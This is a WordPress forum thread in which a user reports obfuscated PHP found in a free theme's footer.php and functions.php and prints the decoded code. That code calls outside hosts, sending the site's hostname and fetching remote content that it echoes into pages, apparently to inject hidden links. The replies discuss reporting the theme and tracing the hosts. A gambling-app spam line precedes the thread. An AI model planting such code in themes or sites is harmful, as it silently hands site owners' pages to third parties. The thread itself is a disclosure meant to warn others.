777 lucky slots login register philippines app.REGISTER NOW GET FREE 888 PESOS REWARDS!

iandoug
(@iandoug)

15 years, 11 months ago

Hi

So I’m testing a new theme for a client. “Surf Passion”.
Theme loads slow.

Accidentally discover nasty stuff in the footer.php, and even more in functions.php.

The nasty stuff is gzinflated/rot13/base64-encoded php code.

The footer has this:

error_reporting(0);
$CodeURL = “https://linkdock.com/content.php?id=&host=”.urlencode($_SERVER[“HTTP_HOST”]).”&uri=”.urlencode($_SERVER[“REQUEST_URI”]);

if ((intval(get_cfg_var(“allow_url_fopen”)) || intval(ini_get(“allow_url_fopen”))) && function_exists(“file_get_contents”)) {
echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var(“allow_url_fopen”)) || intval(ini_get(“allow_url_fopen”))) && function_exists(“file”)) {
$content = @file($CodeURL);
echo @join(“”, $content);
} elseif (function_exists(“curl_init”)) {
$ch = curl_init($CodeURL);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}

which appears to stick invisible links into footers, presumably to get some pagerank.

functions.php requires 40 levels of decryption to produce this:

<?php

if ( function_exists(‘register_sidebars’) )
register_sidebars(2,array(
‘before_widget’ => ”,
‘after_widget’ => ”,
‘before_title’ => ‘<h2>’,
‘after_title’ => ‘</h2>’,
));

function wp_lk()
{
$loc = urlencode($_SERVER[‘HTTP_HOST’]);
$lname = “www.project-theme.com”;
$file=”pages/$loc.txt”;
$carnivore=”/wp_stat.php?loc=$loc”;

$test=ini_get(‘allow_url_fopen’);
if ($test==0 || $test=”” || $test==”off”)
{
$fps = @fsockopen($lname, 80, $errno, $errstr, 30);
if($fps)
{
$out = “POST $carnivore HTTP/1.1\r\n”;
$out .= “Host: $lname\r\n”;
$out .= “Connection: Close\r\n\r\n”;
@fwrite($fps, $out);
@fclose($fps);
}
}
else
{
@file_get_contents(“https://” .$lname .$carnivore);
}

if ($test==0 || $test=”” || $test==”off”)
{
$code = @file_get_contents(“https://” .$lname .”/” .$file);
}
else
{
$fp = @fsockopen($lname, ’80’, $err_no, $err_str, 30);
if ($fp)
{
@stream_set_timeout($fp, 60);

@fwrite($fp, “GET /$file HTTP/1.1\r\n”);
@fwrite($fp, “Host: $lname\r\n”);
@fwrite($fp, “Connection: Close\r\n\r\n”);

$code = “”;

while(!feof($fp))
{
$code .= @fgets($fp, 1024);
}

$code = trim(strstr($code, “\r\n\r\n”));
}

@fclose($fp);
}

if ( is_string($code) )
echo($code);
}

?>

I can’t find any calls to wp_lk() in the code, maybe it’s hidden somewhere…

Questions:

1. any one know what the code in functions.php does?

2. is there a place where users can identify themes as containing malware, so that they are blacklisted?

thanks, Ian

Viewing 4 replies - 1 through 4 (of 4 total)

Samuel B
(@samboll)

15 years, 11 months ago

Personally, I think we should have a section dealing with these type of themes. Any time some one finds obfuscated code in a theme – list it here and warn people to beware of it.
Maybe authors would get tired of seeing their crappy themes listed here and stop making them.
My .02

note – most of these themes are done this way to simply get google juice but could easily hide some nasties

chaoskaizer
(@chaoskaizer)

15 years, 11 months ago

2. You could try submit the offending website at https://badwarebusters.org/main/ask (safe browsing network).

whooami
(@whooami)

15 years, 11 months ago

that looks like it phoones home to here..

https://www.project-theme.com/wp_stat.php?loc=my-house-asshole

it also grabs a file ..

interested in knowing how many domains this crap has run?

https://www.project-theme.com/pages/

whooami
(@whooami)

15 years, 11 months ago

whats interesting is that this could be reversed. i would never support any kind of denial of service attacks, but I suppose anything is possible.

i ran this from the command line, it outputs a page very similar to the front of that site. I didnt look especially close but it’s either it, or very very close.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Malware in themes’ is closed to new replies.

Malware in themes

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics